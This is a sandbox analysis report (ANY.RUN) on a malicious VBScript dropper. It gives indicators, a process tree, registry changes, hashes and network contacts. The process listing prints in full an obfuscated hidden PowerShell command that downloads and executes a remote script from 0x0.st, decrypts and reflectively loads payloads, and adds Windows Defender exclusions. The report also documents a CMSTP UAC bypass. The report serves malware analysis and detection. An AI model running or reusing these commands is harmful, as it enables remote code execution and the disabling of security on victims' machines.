File name: 1.vbs

Full analysis: https://app.any.run/tasks/6ab06e15-c70a-432e-a60a-eced9dc67997
Verdict: Malicious activity
Analysis date: January 30, 2025, 09:35:01
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: wmi-base64, susp-powershell
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (41501), with CRLF line terminators
MD5: 0BAC4DEFDAA32E2C890218721FF822C1
SHA1: 7AAF8DB5D8F54D39B0D5F5075D40EC04356F4734
SHA256: D4E6970B3DC07B711DD1C81242C7630BDAEE191089ABC4FC25167D636E7ECF7C
SSDEEP: 1536:2O0mqOTTo7ZyEmOHldhy9B5Lj5JYt8FtHf6Ju32cax03/20FFZo+6DJ1aPm:0/hy9fnXYY6x031FFoDJsPm

ANY.RUN is an interactive service that provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is for the user's acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 5488)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6624)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 5488)
      • powershell.exe (PID: 5780)
    • Adds process to the Windows Defender exclusion list

      • dllhost.exe (PID: 6396)
    • Known privilege escalation attack

      • dllhost.exe (PID: 6396)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 5488)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 5488)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 5488)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 5488)
  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 6552)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6388)
      • cmd.exe (PID: 6552)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 6388)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6388)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6552)
      • wscript.exe (PID: 6388)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 6624)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6388)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6624)
      • dllhost.exe (PID: 6396)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 6624)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6624)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 5488)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 5488)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 2168)
    • Script adds exclusion process to Windows Defender

      • dllhost.exe (PID: 6396)
    • Script adds exclusion path to Windows Defender

      • dllhost.exe (PID: 6396)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 2168)
    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • powershell.exe (PID: 6688)
    • Uses TASKKILL.EXE to kill process

      • dllhost.exe (PID: 6396)
  • INFO

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6688)
    • Checks supported languages

      • cvtres.exe (PID: 6536)
    • Create files in a temporary directory

      • cvtres.exe (PID: 6536)
      • csc.exe (PID: 2168)
    • Disables trace logs

      • cmstp.exe (PID: 6616)
      • powershell.exe (PID: 5488)
    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 6616)
    • Found Base64 encoded access to Windows Identity via PowerShell (YARA)

      • cmd.exe (PID: 6624)
      • powershell.exe (PID: 6688)
    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 6624)
      • powershell.exe (PID: 6688)
    • Found Base64 encoded reference to WMI classes (YARA)

      • cmd.exe (PID: 6624)
      • powershell.exe (PID: 6688)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 6624)
      • powershell.exe (PID: 6688)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5780)
    • Creates files in the program directory

      • dllhost.exe (PID: 6396)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5488)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5488)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • cmd.exe (PID: 6624)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5780)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5488)
    • Checks proxy server information

      • powershell.exe (PID: 5488)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 5488)
No Malware configuration.
No data.
Total processes: 146
Monitored processes: 15
Malicious processes: 6
Suspicious processes: 0

Behavior graph

Processes shown in the graph, in order: wscript.exe, cmd.exe, conhost.exe, cmd.exe, conhost.exe, powershell.exe, csc.exe, cvtres.exe, cmstp.exe, CMSTPLUA, powershell.exe, conhost.exe, taskkill.exe, conhost.exe, powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1616
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2168
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\pfhwruf0.cmdline"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
PID: 4984
CMD: taskkill /IM cmstp.exe /F
Path: C:\Windows\System32\taskkill.exe
Parent process: dllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Terminates Processes
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5488"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24gdWZ5cWRkbmJramZsam9wKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnbmsvTkJidTROemdSQndCSUJPWnUvUHZMc0hNSWdJMjZFbDZLV09aZWM0TT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ01xY0tpVUozOTdhMThsR3lUU1pyOXc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gbHdpYXV6dGxubHRjcnduKCRwYXJhbV92YXIpewlJRVggJyRibGplYWNldW9mY2p0Y2x4cnVlZmVtZnBjPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGF1a2ZrYnZleGl1Y2VvbmhjdHVycGFqY249TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRiaG5yaW9mdWN6aXVvZWVoZnZ0cnZtZnF4PU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJsamVhY2V1b2ZjanRjbHhydWVmZW1mcGMsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0F
CQycsICcnKTsJJGJobnJpb2Z1Y3ppdW9lZWhmdnRydm1mcXguQ29weVRvKCRhdWtma2J2ZXhpdWNlb25oY3R1cnBhamNuKTsJJGJobnJpb2Z1Y3ppdW9lZWhmdnRydm1mcXguRGlzcG9zZSgpOwkkYmxqZWFjZXVvZmNqdGNseHJ1ZWZlbWZwYy5EaXNwb3NlKCk7CSRhdWtma2J2ZXhpdWNlb25oY3R1cnBhamNuLkRpc3Bvc2UoKTsJJGF1a2ZrYnZleGl1Y2VvbmhjdHVycGFqY24uVG9BcnJheSgpO31mdW5jdGlvbiB3cnRndWhjbHNqcWxkbHJqYWp0cmJ2ZmpjKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckY3NseG16bGlyaXRpbW90b2hjb2ZubnBwa2tmcGxzcGJ3dGd3dHdwej1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhsd3ZseXNnemNuanJsa29jd25idXZ4enRybHRpeHZsbXBpYnF1ZWxyeXBpZmZrbGpyPSRjc2x4bXpsaXJpdGltb3RvaGNvZm5ucHBra2ZwbHNwYnd0Z3d0d3B6LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhsd3ZseXNnemNuanJsa29jd25idXZ4enRybHRpeHZsbXBpYnF1ZWxyeXBpZmZrbGpyLkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kZW9jaHdkYmp4eG16cHdlZmtwanNidnBlZSA9ICRlbnY6VVNFUk5BTUU7JG1xZHlqY25jdHByc3pkZHBpeW16d2h3eHcgPSAnQzpcVXNlcnNcJyArICRlb2Nod2Rianh4bXpwd2Vma3Bqc2J2cGVlICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbXFkeWpjbmN0cHJzemRkcGl5bXp3aHd4dzskZ2txa2Q9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtcWR5amNuY3RwcnN6ZGRwaXltendod3h3KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkcndyIGluICRna3FrZCkgewlpZiAoJHJ3ci5TdGFydHNXaXRoKCc6OicpKQl7CQkkZnRmYmM9JHJ3ci5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZHJqdmh2ZnFpeW1icHRqamRjdXpzZ211bT1bc3RyaW5nW11dJGZ0ZmJjLlNwbGl0KCdcJyk7SUVYICcka2d3cHlvYWRyb29xc3Jna3ZwdG5yY2RseD1sd2lhdXp0bG5sdGNyd24gKHVmeXFkZG5ia2pmbGpvcCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRkcmp2aHZmcWl5bWJwdGpqZGN1enNnbXVtWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJG95cGFnd2VwanhvaWFqa2x4eGV1dGxsb3A9bHdpYXV6dGxubHRjcnduICh1Znl
xZGRuYmtqZmxqb3AgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZHJqdmh2ZnFpeW1icHRqamRjdXpzZ211bVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt3cnRndWhjbHNqcWxkbHJqYWp0cmJ2ZmpjICRrZ3dweW9hZHJvb3FzcmdrdnB0bnJjZGx4ICRudWxsO3dydGd1aGNsc2pxbGRscmphanRyYnZmamMgJG95cGFnd2VwanhvaWFqa2x4eGV1dGxsb3AgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 5780
CMD: powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: dllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
PID: 6072
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: taskkill.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6388
CMD: "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\1.vbs
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6396
CMD: C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Path: C:\Windows\System32\dllhost.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
PID: 6536
CMD: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES8CA3.tmp" "c:\Users\admin\AppData\Local\Temp\CSCBD17F79653524588AEF9BCFCBCDF6586.TMP"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Parent process: csc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_clr0400.dll
PID: 6552
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\c.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
Total events: 18 120
Read events: 18 108
Write events: 12
Delete events: 0

Modification events

Process: (6616) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: EnableFileTracing
Value: 0

Process: (6616) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: EnableAutoFileTracing
Value: 0

Process: (6616) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: EnableConsoleTracing
Value: 0

Process: (6616) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: FileTracingMask
Value:

Process: (6616) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: ConsoleTracingMask
Value:

Process: (6616) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: MaxFileSize
Value: 1048576

Process: (6616) cmstp.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation: write
Name: FileDirectory
Value: %windir%\tracing

Process: (6616) cmstp.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections
Operation: write
Name: DesktopShortcut
Value: 0

Process: (6396) dllhost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation: write
Name: ProfileInstallPath
Value: C:\ProgramData\Microsoft\Network\Connections\Cm

Process: (6396) dllhost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation: write
Name: SM_AccessoriesName
Value: Accessories
Executable files: 2
Suspicious files: 6
Text files: 13
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID: 6688
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zoabmmfo.m4c.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6388
Process: wscript.exe
Filename: C:\Users\admin\AppData\Local\Temp\c.bat
Type: text
MD5: 230BE88A8BF17AD1A61025E5809D0144
SHA256: 382A7476FA7BA1A11CB5290553BB55D26393A46677F07F7CD76B602F471F8193

PID: 6688
Process: powershell.exe
Filename: C:\Windows\Temp\333ivbol.inf
Type: text
MD5: 27581DBBE3C3840CE72F99C21071898A
SHA256: C5F2BBDEBCCD52C3EBA3C97A251FFA2CCD01F64DE764E560F804045FE868D27B

PID: 2168
Process: csc.exe
Filename: C:\Users\admin\AppData\Local\Temp\pfhwruf0.out
Type: text
MD5: C8FA5A9F1B895F3899496BDA41FE8158
SHA256: 1105747D46C139E6B565CB0A727254C1A57E5E32CAAEA963D006DE43E80A9C53

PID: 2168
Process: csc.exe
Filename: C:\Users\admin\AppData\Local\Temp\CSCBD17F79653524588AEF9BCFCBCDF6586.TMP
Type: binary
MD5: 475EC3747DD04C992FCD22AEB40A13B0
SHA256: 1C1FB3D4D19C20F229E74D51B963B5C95C0AEBD2D8BA0C688BA0ADAE8B98880D

PID: 6688
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\pfhwruf0.0.cs
Type: text
MD5: B8106096972FB511E0CF8B99386ECF93
SHA256: 49D2A0F78CBEC3D87396B6F52F791C66505EDEEC87A70D4CE45721288210DA02

PID: 2168
Process: csc.exe
Filename: C:\Users\admin\AppData\Local\Temp\pfhwruf0.dll
Type: executable
MD5: F6423955CECA3B1CEF6B7F44CF724D3C
SHA256: 1BB58F410249631EF9D54B1F22BAFE3E62DC7C6BD0855D1377B42EE96E1F6370

PID: 6536
Process: cvtres.exe
Filename: C:\Users\admin\AppData\Local\Temp\RES8CA3.tmp
Type: binary
MD5: 8BB8ED20351B211B0B43B8A9D41206D3
SHA256: 39C7626D0394A3A8114593794D57159BF5F3F7F4EF5DE06F36D2AB156A28F6FC

PID: 5780
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF139d6c.TMP
Type: binary
MD5: D040F64E9E7A2BB91ABCA5613424598E
SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670

PID: 5780
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m5vdaxi2.jsb.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 4
TCP/UDP connections: 31
DNS requests: 10
Threats: 2

HTTP requests

PID: 1176
Process: svchost.exe
Method: GET
HTTP Code: 200
IP: 2.17.190.73:80
URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
CN: unknown
Reputation: whitelisted

PID: 6876
Process: SIHClient.exe
Method: GET
HTTP Code: 200
IP: 23.35.229.160:80
URL: http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
CN: unknown
Reputation: whitelisted

PID: 6876
Process: SIHClient.exe
Method: GET
HTTP Code: 200
IP: 23.35.229.160:80
URL: http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
CN: unknown
Reputation: whitelisted

PID: 4556
Process: backgroundTaskHost.exe
Method: GET
HTTP Code: 200
IP: 2.17.190.73:80
URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
CN: unknown
Reputation: whitelisted

Connections

PID: 4
Process: System
IP: 192.168.100.255:138
Reputation: whitelisted

IP: 20.73.194.208:443
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: NL
Reputation: whitelisted

PID: 1176
Process: svchost.exe
IP: 20.190.160.128:443
Domain: login.live.com
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: NL
Reputation: whitelisted

PID: 1176
Process: svchost.exe
IP: 2.17.190.73:80
ASN: AKAMAI-AS
CN: DE
Reputation: unknown

PID: 1076
Process: svchost.exe
IP: 23.218.210.69:443
Domain: go.microsoft.com
ASN: AKAMAI-AS
CN: DE
Reputation: whitelisted

PID: 5064
Process: SearchApp.exe
IP: 92.123.104.15:443
ASN: Akamai International B.V.
CN: DE
Reputation: unknown

PID: 4328
Process: svchost.exe
IP: 20.73.194.208:443
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: NL
Reputation: whitelisted

PID: 4
Process: System
IP: 192.168.100.255:137
Reputation: whitelisted

PID: 5488
Process: powershell.exe
IP: 168.119.145.117:443
Domain: 0x0.st
ASN: Hetzner Online GmbH
CN: DE
Reputation: suspicious

PID: 6876
Process: SIHClient.exe
IP: 20.12.23.50:443
Domain: slscr.update.microsoft.com
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: US
Reputation: whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 20.190.160.128
  • 40.126.32.138
  • 40.126.32.134
  • 20.190.160.130
  • 40.126.32.133
  • 20.190.160.20
  • 20.190.160.67
  • 20.190.160.64
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
0x0.st
  • 168.119.145.117
unknown
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.74.47.205
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.48
whitelisted

Threats

PID: 2192
Process: svchost.exe
Class: Misc activity
Message: ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)

PID: 5488
Process: powershell.exe
Class: Misc activity
Message: ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
No debug info